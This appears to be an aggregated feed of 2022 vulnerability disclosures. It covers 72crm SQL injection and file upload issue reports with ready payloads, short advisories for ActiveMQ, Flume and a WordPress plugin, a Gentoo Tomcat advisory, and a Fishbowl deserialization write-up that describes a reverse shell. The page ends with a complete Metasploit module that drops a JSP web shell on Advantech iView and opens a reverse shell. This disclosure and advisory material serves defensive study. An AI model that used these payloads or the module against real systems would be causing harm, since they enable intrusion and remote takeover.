An issue was discovered in 72crm 9.0. There is a SQL Injection vulnerability in View the task calendar.

****Brief of this vulnerability****

72crm v9 has sql injection vulnerability in View the task calendar

****Test Environment****

*   Windows10
*   PHP 5.6.9+Apache/2.4.39

****Affect version****

72crm v9

****Vulnerable Code****

application\\work\\controller\\Task.php line 506

The $param parameter is passed to getDateList

The start\_time parameter and stop\_time parameter are directly spliced ​​into $whereDate, and then executed on line 493. resulting in sql injection vulnerability

****Vulnerability display****

First enter the background

Click as shown,go to the View the task calendar and capture the packet

payload: start\_time=1&stop\_time=1))+or+sleep(2)--+

Sleep successfully for 2 seconds

If debug mode is enabled  
  
payload：start\_time=1&stop\_time=1))+or+updatexml(1,concat(0x7e,database(),0x7e,version()),1)--+  
  
Successfully obtained the database name and version number

CVE-2022-37178: 72crm v9 has sql injection vulnerability · Issue #34 · 72wukong/72crm-9.0-PHP

72crm 9.0 has an Arbitrary file upload vulnerability.

****Brief of this vulnerability****

72crm v9 has Arbitrary file upload vulnerability Where to upload the logo

****Test Environment****

*   Windows10
*   PHP 5.6.9+Apache/2.4.39

****Affect version****

72crm v9

****Vulnerable Code****

application\\admin\\controller\\System.php line 51  
  
After follow-up, it was found that the validate was not set, and the move operation was performed directly, resulting in the ability to upload any file  
  
follow-up move function（set filename）  
line 352:  
  
follow up function  
Generate time-based file names with php as a suffix  
  
then move\_uploaded\_file with this filename （thinkphp\\library\\think\\File.php line 369）  

****Vulnerability display****

First enter the background  
Click as shown,go to the Enterprise management background  
  
click this  
  
Just upload a picture and capture the package, modify the content as follows  
  
Back to enterprise management background  
  
access image address  
  
php code executed successfully  
Notice：Because it is uploaded at the logo, unauthorized users can also access this php code

CVE-2022-37181: 72crm v9 has Arbitrary file upload vulnerability · Issue #35 · 72wukong/72crm-9.0-PHP

In Apache ActiveMQ Artemis prior to 2.24.0, an attacker could show malicious content and/or redirect users to a malicious URL in the web console by using HTML in the name of an address or queue.

**HTML Injection in ActiveMQ Artemis Web Console**

Moderate severity GitHub Reviewed Published Aug 24, 2022 • Updated Aug 30, 2022

GHSA-cv6r-h2fm-pvrp: HTML Injection in ActiveMQ Artemis Web Console

Multiple Authenticated (contributor+) Persistent Cross-Site Scripting (XSS) vulnerabilities in W3 Eden Download Manager plugin <= 3.2.48 at WordPress.

CVE-2022-34658: Download Manager

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-35278

Gentoo Linux Security Advisory 202208-34 - Multiple vulnerabilities have been discovered in Apache Tomcat, the worst of which could result in denial of service. Versions less than 8.5.82:8.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-34  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Apache Tomcat: Multiple Vulnerabilities  
     Date: August 21, 2022  
     Bugs: #773571, #801916, #818160, #855971  
       ID: 202208-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Apache Tomcat, the  
worst of which could result in denial of service.

Background  
=========  
Apache Tomcat is a Servlet-3.0/JSP-2.2 Container.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-servers/tomcat         < 8.5.82:8.5              >= 8.5.82:8.5  
                                < 9.0.65:9                >= 9.0.65:9  
                                < 10.0.23:10              >= 10.0.23:10

Description  
==========  
Multiple vulnerabilities have been discovered in Apache Tomcat. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Apache Tomcat 10.x users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-servers/tomcat-10.0.23:10"

All Apache Tomcat 9.x users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-servers/tomcat-9.0.65:9"

All Apache Tomcat 8.5.x users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-servers/tomcat-8.5.82:8.5"

References  
=========  
[ 1 ] CVE-2021-25122  
      https://nvd.nist.gov/vuln/detail/CVE-2021-25122  
[ 2 ] CVE-2021-25329  
      https://nvd.nist.gov/vuln/detail/CVE-2021-25329  
[ 3 ] CVE-2021-30639  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30639  
[ 4 ] CVE-2021-30640  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30640  
[ 5 ] CVE-2021-33037  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33037  
[ 6 ] CVE-2021-42340  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42340  
[ 7 ] CVE-2022-34305  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34305

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-34

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-34

Apache Flume versions 1.4.0 through 1.10.0 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.

**Remote code execution in Apache Flume**

Critical severity GitHub Reviewed Published Aug 22, 2022 • Updated Aug 30, 2022

GHSA-h9mh-mgpv-gqmv: Remote code execution in Apache Flume

CVE-2022-34916

A Java Deserialization vulnerability in the Fishbowl Server in Fishbowl Inventory before 2022.4.1 allows remote attackers to execute arbitrary code via a crafted XML payload.

**Finding A Shell In Your Fishbowl**

White Oak Security discovered an instance of Fishbowl Inventory that was vulnerable to a Java deserialization vulnerability, resulting in unauthenticated remote code execution. 

This issue has been remediated as of release 2022.4.1.

CVE-2022-29805 has been reserved for this vulnerability and is pending official publication.

**Disclosure Timeline**

Before we dive into the details, we want to give our thanks to the Fishbowl Inventory support and development team for their constant communication providing updates while disclosing this issue. Fishbowl Inventory responded promptly to the original disclosure request and resolved the issue in a timely manner which is a very refreshing and mature response from the organization. From our perspective, Fishbowl Inventory is doing everything right in this regard and we hope other organizations follow their lead. 

White Oak Security followed responsible disclosure guidelines by giving Fishbowl Inventory time to remediate this vulnerability and allow customers ample time to patch their instances.

**4/7/22**: Attempted to contact Fishbowl Inventory via online support ticket.

**4/8/22**: Received contact from Fishbowl Inventory. Disclosed vulnerability documentation via the support ticket.

**4/12/22**: Received confirmation that the vulnerability details have been transferred to the development team.

**4/13/22**: Development team confirms that the vulnerability is valid and they are working on a solution.

**4/25/22**: Patch released to the general public with version 2022.4.1.

**8/18/22:** White Oak Security publicly discloses the finding according to our vulnerability disclosure policy.

**Fishbowl Inventory Overview**

Fishbowl Inventory is an inventory management system that helps organize product inventory with accounting integrations and other necessary workflows. The application consists of a web server, inventory server, and desktop application to interact with the servers and perform the business logic. 

**Fishbowl Exposure**

Using Shodan, the Fishbowl Server can be found exposed on the internet on a handful of servers. White Oak Security confirmed that the vulnerable port (28192) was exposed on several hosts, however, White Oak Security did not attempt exploitation against any internet-facing host. 

As specified within the support library article below, the Fishbowl Server on port 28192 is exposed during default installations (1). Therefore, it is reasonable to assume that every internet-facing instance of Fishbowl, in its default configuration without additional firewall rules, would have been vulnerable to this exploit.

**Fishbowl Vulnerability Analysis**

The Fishbowl Server establishes a web server on 80/443 and a TCP Socket Server listening on port 28192 by default. This TCP Socket Server on port 28192 is the vulnerable service. We used Sysinternals TCPView (2) to view the local endpoints.

Analyzing the application installation, the Fishbowl Server Administration program controls the server port, default of 28192.

The Fishbowl Server handles all message processing as a TCP Socket Server. This socket server processes incoming data streams and determines if the data is either JSON or XML. In this vulnerability, we are interested in the XML flow. 

**Fishbowl Attack Flow**

The attack flow can be simplified as the following steps:

1.  TCP Socket Server parses incoming data streams; validates for JSON or XML data types
2.  In the XML flow, an XML document is built from the incoming data
3.  A custom XML parser is created which parses the XML structure, beginning with the root <event> tag
4.  The custom XML parser extracts data from the <head>, <user>, and <body> children elements.
5.  Within the <head> XML element parsing flow, the application base64 decodes a <src> child tag and converts the data within that <src> element into an arbitrary object input stream (using the Java readObject() function). 
6.  This directly leads to an exploitable deserialization condition as any arbitrary object can be provided in this element, such as an object which executes remote commands (called a Gadget Chain).

This is a typical Java Deserialization vulnerability and we should be able to use a pre-existing Gadget Chain using ysoserial (3). Additionally, a custom gadget could be created from pre-existing Fishbowl library objects but was unnecessary for exploitation at this time. For additional information about Java Deserialization vulnerabilities and gadget chains, check out the original research by Chris Frohoff.

The libraries within the Fishbowl Inventory application deployment include several references to the Apache Commons collections, which would allow us to use one of the payloads pre-existing in ysoserial (3).

The Socket Server parses XML data and performs a readObject() on various XML element byte streams. To exploit this issue, White Oak Security used ysoserial (3), a Java Deserialization exploitation kit, to generate a payload that will be deserialized by the application server to execute any command on the host. In this example, a simple PowerShell reverse shell is used to connect back to the target server.

The format of the payload is shown below, where the required event, head, and src fields are used. The payload is contained within the source element body.

    <?xml version='1.0' encoding='utf-8'?>
    <event>
    <head>
    <src name='xyz'>" + payload + "</src>
    </head>
    </event>

Next, a simple Java Socket client was created which connects to the vulnerable server and sends the Java Object as a DataOutputStream. The payload is decoded from XML and then has deserialization performed against many underlying XML child elements. In this example, the ‘src’ element is targeted.

The data is sent to the server and remote code execution is achieved, with a reverse shell (TCP connection) established from the Fishbowl Server to the attacker-controlled host.

**More From White Oak Security**

White Oak Security is a highly skilled and knowledgeable cyber security testing company that works hard to get into the minds of opponents to help protect those we serve from malicious threats through expertise, integrity, and passion.

Read more from White Oak Security’s pentesting team.

****Sources****

1.  https://help.fishbowlinventory.com/hc/en-us/articles/360042632634-Fishbowl-Hosted-Services – FIshbowl Inventory Server Ports Documentation
2.  https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview – Tool for local process analysis
3.  https://github.com/frohoff/ysoserial – Tool for Java Object Deserialization

CVE-2022-29805: Fishbowl Disclosure: CVE-2022-29805 | White Oak Security

Advantech iView software versions prior to 5.7.04.6469 are vulnerable to an unauthenticated command injection vulnerability via the NetworkServlet endpoint. The database backup functionality passes a user-controlled parameter, backup_file to the mysqldump command. The sanitization functionality only tests for SQL injection attempts and directory traversal, so leveraging the -r and -w mysqldump flags permits exploitation. The command injection vulnerability is used to write a payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Advantech iView NetworkServlet Command Injection',        'Description' => %q{          Versions of Advantech iView software below `5.7.04.6469` are          vulnerable to an unauthenticated command injection vulnerability          via the `NetworkServlet` endpoint.          The database backup functionality passes a user-controlled parameter,          `backup_file` to the `mysqldump` command. The sanitization functionality only          tests for SQL injection attempts and directory traversal, so leveraging the          `-r` and `-w` `mysqldump` flags permits exploitation.          The command injection vulnerability is used to write a payload on the target          and achieve remote code execution as NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'y4er', # PoC          'Shelby Pace' # Metasploit module        ],        'References' => [          [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],          [ 'CVE', '2022-2143']        ],        'Platform' => [ 'win' ],        'Privileged' => true,        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],        'Targets' => [          [            'Windows Dropper',            {              'Arch' => [ ARCH_X86, ARCH_X64 ],              'Type' => :win_dropper,              'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }            }          ]        ],        'DisclosureDate' => '2022-06-28',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),        OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),        OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])      ]    )  end  def check    res = send_request_cgi!(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    return CheckCode::Unknown('Failed to receive a response from the application') unless res    unless res.body.include?('iView')      return CheckCode::Safe('No confirmation that target is Advantech iView')    end    res = send_db_backup_request('')    return CheckCode::Detected('Failed to receive response from backup request') unless res    # The patch added auth as a requirement for    # accessing the NetworkServlet endpoint    if res.body =~ /ERROR:\s+User\s+Not\sLogin/      @needs_auth = true      print_status('Vulnerability is present, though authentication is required.')    end    CheckCode::Appears  end  def send_db_backup_request(filename)    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),      'keep_cookies' => true,      'vars_post' =>      {        'page_action_type' => 'backupDatabase',        'backup_filename' => filename      }    )  end  def format_jsp    bin_nums = []    arg_nums = []    flag_nums = []    bin_param.each_char { |c| bin_nums << c.ord }    bin_nums = bin_nums.join(',')    arg_param.each_char { |c| arg_nums << c.ord }    arg_nums = arg_nums.join(',')    flag_param.each_char { |c| flag_nums << c.ord }    flag_nums = flag_nums.join(',')    '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \    'new ProcessBuilder(request.getParameter(' \    "new java.lang.String(new byte[]{#{bin_nums}}))," \    "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \    "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \    '.getInputStream()))%>'  end  def flag_param    @flag_param ||= Rex::Text.rand_text_alpha(3..8)  end  def arg_param    @arg_param ||= Rex::Text.rand_text_alpha(3..8)  end  def bin_param    @bin_param ||= Rex::Text.rand_text_alpha(3..8)  end  def jsp_filename    @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"  end  def execute_command(cmd, _opts = {})    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename),      'keep_cookies' => true,      'vars_get' =>      {        bin_param => 'cmd.exe',        flag_param => '/c',        arg_param => cmd      }    )  end  def iview_authenticate    res = send_request_cgi!(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')    vprint_good('Successfully accessed the login page')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'CommandServlet'),      'keep_cookies' => true,      'vars_post' => {        'page_action_service' => 'UserServlet',        'page_action_type' => 'login',        'user_name' => datastore['USERNAME'],        'user_password' => datastore['PASSWORD'],        'use_ldap' => 'false',        'data' => ''      }    )    unless res && res.body.include?('Success')      fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')    end    vprint_good('Authentication successful!')  end  def need_auth?    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'NetworkServlet')    )    return false unless res    !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)  end  def exploit    if @needs_auth || need_auth?      iview_authenticate    end    jsp_code = format_jsp    sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"    full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""    res = send_db_backup_request(full_cmd)    fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res    path = "webapps\\iView3\\#{jsp_filename}"    register_file_for_cleanup(path)    if target['Type'] == :win_dropper      execute_cmdstager    else      execute_command(payload.encoded)    end  endend

Tag

#apache